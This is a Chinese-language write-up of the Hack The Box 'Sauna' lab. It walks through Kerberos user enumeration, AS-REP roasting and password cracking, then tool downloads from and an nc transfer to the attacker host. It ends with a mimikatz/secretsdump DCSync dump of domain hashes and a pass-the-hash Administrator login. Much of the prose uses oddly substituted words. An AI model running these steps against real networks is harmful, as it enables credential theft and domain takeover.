免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责
服务探测
端口发现
┌──(rootkali)-[~/htb/Sauna]└─# nmap -p- -Pn 10.10.10.175 --openHost discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 09:23 ESTNmap scan report for 10.10.10.175Host is up (0.26s latency).Not shown: 65515 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE53/tcp open domain80/tcp open http88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds464/tcp open kpasswd5593/tcp open http-rpc-epmap636/tcp open ldapssl3268/tcp open globalcatLDAP3269/tcp open globalcatLDAPssl5985/tcp open wsman9389/tcp open adws49667/tcp open unknown49673/tcp open unknown49674/tcp open unknown49677/tcp open unknown49689/tcp open unknown49697/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 1192.54 seconds
具体端口信息
──(rootkali)-[~/htb/Sauna]└─# nmap -Pn -sV -A -O 10.10.10.175 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49686,49697Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 09:45 ESTNmap scan report for 10.10.10.175Host is up (0.26s latency).PORT STATE SERVICE VERSION53/tcp open domain Simple DNS Plus80/tcp open http Microsoft IIS httpd 10.0| http-methods: |_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/10.0|_http-title: Egotistical Bank :: Home88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-03 22:45:17Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)3269/tcp open tcpwrapped5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found9389/tcp open adws?| fingerprint-strings: | DNSStatusRequestTCP, Kerberos, SMBProgNeg, afp, oracle-tns: |_ Ihttp://schemas.microsoft.com/ws/2006/05/framing/faults/UnsupportedVersion49667/tcp open msrpc Microsoft Windows RPC49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.049674/tcp open msrpc Microsoft Windows RPC49677/tcp open msrpc Microsoft Windows RPC49686/tcp filtered unknown49697/tcp open msrpc Microsoft Windows RPC1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port9389-TCP:V=7.91%I=7%D=1/3%Time=61D30C0C%P=x86_64-pc-linux-gnu%r(DNSSF:StatusRequestTCP,4B,"\x08Ihttp://schemas\.microsoft\.com/ws/2006/05/fraSF:ming/faults/UnsupportedVersion")%r(Kerberos,4B,"\x08Ihttp://schemas\.miSF:crosoft\.com/ws/2006/05/framing/faults/UnsupportedVersion")%r(SMBProgNeSF:g,4B,"\x08Ihttp://schemas\.microsoft\.com/ws/2006/05/framing/faults/UnsSF:upportedVersion")%r(oracle-tns,4B,"\x08Ihttp://schemas\.microsoft\.com/SF:ws/2006/05/framing/faults/UnsupportedVersion")%r(afp,4B,"\x08Ihttp://scSF:hemas\.microsoft\.com/ws/2006/05/framing/faults/UnsupportedVersion");Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portOS fingerprint not ideal because: Missing a closed TCP port so results incompleteNo OS matches for hostNetwork Distance: 2 hopsService Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: 8h00m00s| smb2-security-mode: | 2.02: |_ Message signing enabled and required| smb2-time: | date: 2022-01-03T22:46:21|_ start_date: N/ATRACEROUTE (using port 445/tcp)HOP RTT ADDRESS1 253.57 ms 10.10.14.12 254.12 ms 10.10.10.175OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 121.12 seconds
有DNS,kerberos和ldap,显然这是一台DC服务器。
枚举域名
┌──(rootkali)-[~/htb/Sauna]└─# crackmapexec smb 10.10.10.175 -u 'anonymous' -p '' --shares SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)SMB 10.10.10.175 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\anonymous: STATUS_LOGON_FAILURE
失去一个域名:EGOTISTICAL-BANK.LOCAL
枚举了一大轮,拿不到任何有用的货色。无奈关上smb分享目录,也不晓得任何有用的用户名。
Kerberos
应用nmap枚举kerberos的用户名
──(rootkali)-[~/htb/Sauna]└─# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="EGOTISTICAL-BANK.LOCAL",userdb=/usr/share/wordlists/SecLists/Usernames/cirt-default-usernames.txt 10.10.10.175Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 07:03 ESTNmap scan report for 10.10.10.175Host is up (0.30s latency).PORT STATE SERVICE88/tcp open kerberos-sec| krb5-enum-users: | Discovered Kerberos principals| ADMINISTRATOR@EGOTISTICAL-BANK.LOCAL| Administrator@EGOTISTICAL-BANK.LOCAL|_ administrator@EGOTISTICAL-BANK.LOCALNmap done: 1 IP address (1 host up) scanned in 41.32 seconds
看见只有一个administrator
的用户名,这个显然目前咱们是没有权限的
80端口的http服务看起来像是一个公司的介绍网页,尝试制作一份user名单
cewl -d 1 -m 3 -w user.txt 10.10.10.175
再用制作成的名单枚举kerberos的用户名
┌──(rootkali)-[~/htb/Sauna]└─# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="EGOTISTICAL-BANK.LOCAL",userdb=/root/htb/Sauna/user.txt 10.10.10.175Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 08:00 ESTNmap scan report for 10.10.10.175Host is up (0.30s latency).PORT STATE SERVICE88/tcp open kerberos-sec| krb5-enum-users: | Discovered Kerberos principals|_ sauna@EGOTISTICAL-BANK.LOCALNmap done: 1 IP address (1 host up) scanned in 16.22 seconds
失去一个新的用户名sauna
web
在about us页面暴露出了team member的名字,手动制作一个用户名字典
把咱们下面找到的两个kerberos的用户名也加上这个字典
┌──(rootkali)-[~/htb/Sauna]└─# cat userFergus SmithFergusSmithFergus.SmithFergusSmithFergus.SfsmithShaun CoinsShaunCoinsShaun.CoinsShaunCoinsShaun.CscoinsHugo BearHugoBearHugo.BearHugoBearHugo.BhbearBowie TaylorBowieTaylorBowie.TaylorBowieTaylorBowie.TbtaylorSophie DriverSophieDriverSophie.DriverSophieDriverSophie.DsdriverSteven KerbStevenKerbSteven.KerbStevenKerbSteven.Kskerbsaunaadministrator
应用GetNPUsers.py
尝试向kerberos申请不须要预认证的票据
hacktricks里的解释:
That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.
┌──(rootkali)-[~/htb/Sauna]└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile /root/htb/Sauna/user -outputfile hashes.asreproast -dc-ip 10.10.10.175
能够看到拿到一个fsmith
的票据
┌──(rootkali)-[~/htb/Sauna]└─# cat hashes.asreproast $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:85853ae8057c9c84f1ae5e3860cfcf35$29c704dfe2ce770414e478fcb530171c1b749dce35187d79c2679d93eaa6d2f5cd068123b2e4bbe3f59a94c1e589aa494ab81aa8d5c5c4d0bfdfa7a77320c3651f69e58550327e188e1b551f4d7d5a85fd0d541793c37e1908197d535f32ac12442756f3d5264610f155bcf1f341b29fa07234aaf7cd10a74c8fea80dddf6a8f5364633faf65313b81401888d24115e8c1bdb6fa2b45cf88b95c7f0b02f64cdf3ac44eb71fca52b9c187fa91bbcc9bd743ea59b8625abb2e8c94e632df4f3e2a8d50ed035e8b796e1ee1d57b1d6d85b4813af2b76c2af16da1ac9b2880f20c2afdac285dc57c200595de6d22df40eba458438d6b3082b3a66bebeeea0e04aacc
john破解
┌──(rootkali)-[~/htb/Sauna]└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast Using default input encoding: UTF-8Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])Will run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusThestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)1g 0:00:00:10 DONE (2022-01-03 10:33) 0.09775g/s 1030Kp/s 1030Kc/s 1030KC/s Thing..Thehunter22Use the "--show" option to display all of the cracked passwords reliablySession completed
foodhold
拿到一个用户凭证:fsmith:Thestrokes23
应用evil-winrm登录,拿到foodhold和user.txt
┌──(rootkali)-[~/htb/Sauna]└─# evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'Evil-WinRM shell v3.3Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machineData: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\FSmith\Documents> whoamiegotisticalbank\fsmith
提权
传winpeas和nc到靶机:powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/winPEASx64.exe','C:\Users\FSmith\Desktop\winPEASx64.exe')"
执行winpea,重定向到o.txt:
&{C:\Users\FSmith\Desktop\winPEASx64.exe} > o.txt
poweshell利用nc.exe传送文件
接管nc -nlvp 4444 > o.txt
传送Get-Content o.txt | .\nc.exe -w 3 10.10.16.3 4444 | tee test.log
发现一个用户明码
???????????? Looking for AutoLogon credentials Some AutoLogon credentials were found DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround!
查看靶机的用户
*Evil-WinRM* PS C:\> net usersUser accounts for \\-------------------------------------------------------------------------------Administrator FSmith GuestHSmith krbtgt svc_loanmgrThe command completed with one or more errors.
用evil-winrm登录到svc_loanmgr
,查看用户信息信息
*Evil-WinRM* PS C:\> net users svc_loanmgrUser name svc_loanmgrFull Name L ManagerCommentUser's commentCountry/region code 000 (System Default)Account active YesAccount expires NeverPassword last set 1/24/2020 3:48:31 PMPassword expires NeverPassword changeable 1/25/2020 3:48:31 PMPassword required YesUser may change password YesWorkstations allowed AllLogon scriptUser profileHome directoryLast logon NeverLogon hours allowed AllLocal Group Memberships *Remote Management UseGlobal Group memberships *Domain UsersThe command completed successfully.
看到svc_loanmgr
在Remote Management Use
组
查看这个组的解释
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net localgroup "Remote Management Users"Alias name Remote Management UsersComment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.Members-------------------------------------------------------------------------------FSmithsvc_loanmgrThe command completed successfully.
如同就是一个近程拜访组。
咱们尝试应用DCSync
攻打尝试窃取用户哈希
对于DCSync
,hacktricks上是这样解释的:
- The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
- By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.
- If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text
默认有权限执行DCSync的用户组是:Domain Admins, Enterprise Admins, Administrators, and Domain Controllers
把mimikatz.exe从kali传到靶机:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/mimikatz.exe','C:\Users\svc_loanmgr\Documents\mimikatz.exe')"
执行上面命令触发DC同步
mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv" exit
能够看见导出了用户的哈希
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ./mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv" exit .#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # privilege::debugERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061mimikatz(commandline) # lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv[DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server[DC] Exporting domain 'EGOTISTICAL-BANK.LOCAL'502 krbtgt 4a8899428cad97676ff802229e466e2c 5141103 HSmith 58a52d36c84fb7f5f1beab9a201db1dd 660481000 SAUNA$ 230699e71e07d687981fc0685082b5cc 532480500 Administrator 823452073d75b9d1cf70ebdf86c7f98e 660481105 FSmith 58a52d36c84fb7f5f1beab9a201db1dd 42603521108 svc_loanmgr 9cb31797c39a9b170b04058ba2bba48c 66048mimikatz(commandline) # exitBye!
利用evil-winrm,应用哈希明码间接登录到Administrator
(pass-the-hash)
┌──(rootkali)-[~/htb/Sauna]└─# evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.10.10.175Evil-WinRM shell v3.2Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\Administrator\Documents> whoamiegotisticalbank\administrator
总结
通过web页面展现的信息,咱们猜测到了一个用户名
应用GetNPUsers.py
尝试向kerberos申请不须要预认证的票据,咱们因而拿到了foodhold
应用winpeas,咱们枚举到了另外一个用户的明文凭证,因而咱们能够提权到svc_loanmgr
利用DCSync拿到管理员的哈希明码,从而提权到administrator
补充
secretsdump.py
拿到svc_loanmgr
的凭证当前应用secretsdump.py也能够爆出其余用户的哈希明码,原理也是DCSync:
┌──(rootkali)-[~/htb/Sauna]└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py EGOTISTICALBANK/svc_loanmgr:Moneymakestheworldgoround\\!@10.10.10.175Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretsAdministrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:230699e71e07d687981fc0685082b5cc:::[*] Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4eAdministrator:des-cbc-md5:fb8f321c64cea87fkrbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9krbtgt:des-cbc-md5:c170d5dc3edfc1d9EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843bEGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76bEGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacbaEGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972cEGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2SAUNA$:aes256-cts-hmac-sha1-96:8dccc32df17c3189f01f7702e6198f9a01199229d04420d830bca8dc8a1b483eSAUNA$:aes128-cts-hmac-sha1-96:a2927c8ea3e312d65894d9b1e508931fSAUNA$:des-cbc-md5:7c2c156d022c0131[*] Cleaning up...
如何晓得本账号是否有权限应用DCSync?
把PowerView.ps1下载到本地
登录到靶机
┌──(rootkali)-[~/htb/Sauna]└─# evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' -s '/root/PowerSploit/Recon'
引入PowerView.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> PowerView.ps1
查看svc_loanmgr和Fsmith的域权限
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Get-ObjectAcl -DistinguishedName "dc=EGOTISTICAL-BANK,dc=LOCAL" -ResolveGUIDs | ? {$_.IdentityReference -match "svc_loanmgr|Fsmith"}InheritedObjectType : AllObjectDN : DC=EGOTISTICAL-BANK,DC=LOCALObjectType : AllIdentityReference : EGOTISTICALBANK\FSmithIsInherited : FalseActiveDirectoryRights : ReadProperty, GenericExecutePropagationFlags : NoneObjectFlags : NoneInheritanceFlags : NoneInheritanceType : NoneAccessControlType : AllowObjectSID : S-1-5-21-2966785786-3096785034-1186376766/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecatedInheritedObjectType : AllObjectDN : DC=EGOTISTICAL-BANK,DC=LOCALObjectType : AllIdentityReference : EGOTISTICALBANK\svc_loanmgrIsInherited : FalseActiveDirectoryRights : ReadProperty, GenericExecutePropagationFlags : NoneObjectFlags : NoneInheritanceFlags : NoneInheritanceType : NoneAccessControlType : AllowObjectSID : S-1-5-21-2966785786-3096785034-1186376766InheritedObjectType : AllObjectDN : DC=EGOTISTICAL-BANK,DC=LOCALObjectType : DS-Replication-Get-ChangesIdentityReference : EGOTISTICALBANK\svc_loanmgrIsInherited : FalseActiveDirectoryRights : ExtendedRightPropagationFlags : NoneObjectFlags : ObjectAceTypePresentInheritanceFlags : NoneInheritanceType : NoneAccessControlType : AllowObjectSID : S-1-5-21-2966785786-3096785034-1186376766InheritedObjectType : AllObjectDN : DC=EGOTISTICAL-BANK,DC=LOCALObjectType : DS-Replication-Get-Changes-AllIdentityReference : EGOTISTICALBANK\svc_loanmgrIsInherited : FalseActiveDirectoryRights : ExtendedRightPropagationFlags : NoneObjectFlags : ObjectAceTypePresentInheritanceFlags : NoneInheritanceType : NoneAccessControlType : AllowObjectSID : S-1-5-21-2966785786-3096785034-1186376766
注意ObjectType里显示svc_loanmgr领有 DS-Replication-Get-Changes
和DS-Replication-Get-Changes-All
表明用户能够应用DCSync,参考这篇文章
另外,也能够通过bloodhound查看以后账号在域中的权限,也能够查看到是否有DCSync权限。
对于上传下载
这个我是看IppSec的视频才晓得的,evil-winrm登录当前能够间接通过upload和download命令上传下载文件,唔,原理如此不便,涨姿态了-_-!